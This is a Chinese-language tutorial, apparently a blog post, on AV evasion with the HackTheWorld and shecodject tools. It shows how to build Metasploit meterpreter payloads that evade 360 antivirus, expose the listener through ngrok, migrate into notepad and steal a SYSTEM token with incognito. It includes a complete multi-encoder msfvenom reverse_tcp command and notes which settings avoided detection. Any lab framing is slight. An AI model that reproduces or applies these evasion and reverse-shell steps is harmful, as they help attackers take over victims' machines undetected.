免杀之HackTheWorld与Shecodject

1、HackTheWorld

Git:https://github.com/stormshadow07/HackTheWorld

安装环境python2,相关依赖环境。

免杀之HackTheWorld与Shecodject_第1张图片

 

生成一个msf免杀payload:

首先设置payload类型:

免杀之HackTheWorld与Shecodject_第2张图片

其中LHOST可以使用ngrok内网映射工具,将本地kali反射到公网。

LPORT是通过ngrok进行反射时分配的端口。

实验过程中TCP类型的Payload被360查杀,https类型未被查杀。

之后就是输入密钥等等。

免杀之HackTheWorld与Shecodject_第3张图片

开启msf的监听模块:

免杀之HackTheWorld与Shecodject_第4张图片

运行程序之后,未触发360,成功获取session:

免杀之HackTheWorld与Shecodject_第5张图片

原进程在火绒剑中属于异常进程,获取session之后首先进行进程迁移:

免杀之HackTheWorld与Shecodject_第6张图片

迁移到notepad进程。

 

权限提升:

通过令牌窃取提升权限:

首先是低权用户,直接getsystem失败:

导入incognito模块:

列出可用令牌:

免杀之HackTheWorld与Shecodject_第7张图片

窃取system令牌:

注意添加双引号和两个反斜杠

成功获取SYSTEM权限:

 

 

 

 

第二款工具:shecodject

Git地址:https://github.com/TaroballzChen/shecodject

安装环境说明:2020版kali安装过程使用root权限安装,工具通过docker进行打包,会使用到docker镜像,安装完成之后最好将docker源换成国内源。

 

1、通过mpr方式生成免杀shellcode

免杀之HackTheWorld与Shecodject_第8张图片

执行run命令,会生成shellcode的临时文件:

免杀之HackTheWorld与Shecodject_第9张图片

之后back回到系统命令,然后输入exe对之前生成的临时文件进行打包:

此处设置noconsole的值会影响360的查杀,有控制台是360不能查杀,无console时会被查杀。

之后run既可以。

Noconsole被查杀

免杀之HackTheWorld与Shecodject_第10张图片

 

存在concole的没有被查杀:

免杀之HackTheWorld与Shecodject_第11张图片

并且成功获取session

 

 

2、

首先生成pem证书:

免杀之HackTheWorld与Shecodject_第12张图片

合并rsaprivate.key和servercertifcate.crt为pem文件:

免杀之HackTheWorld与Shecodject_第13张图片

使用msfvenom生成原始的shellcode:

这里使用多次编码生成原始文件:

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.139 Lport=4444 --platform windows -a x86 HandlerSSLCert=./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > ./shellcode.raw

 

免杀之HackTheWorld与Shecodject_第14张图片

利用shecodject进行免杀:

使用scc模块,将raw生成tmp文件:

免杀之HackTheWorld与Shecodject_第15张图片

然后利用exe模块进行打包:

免杀之HackTheWorld与Shecodject_第16张图片

有console的状态免杀:

免杀之HackTheWorld与Shecodject_第17张图片

测试无console,免杀:

你可能感兴趣的:(内网渗透,MSF,免杀,shecodject,HackTheWorld)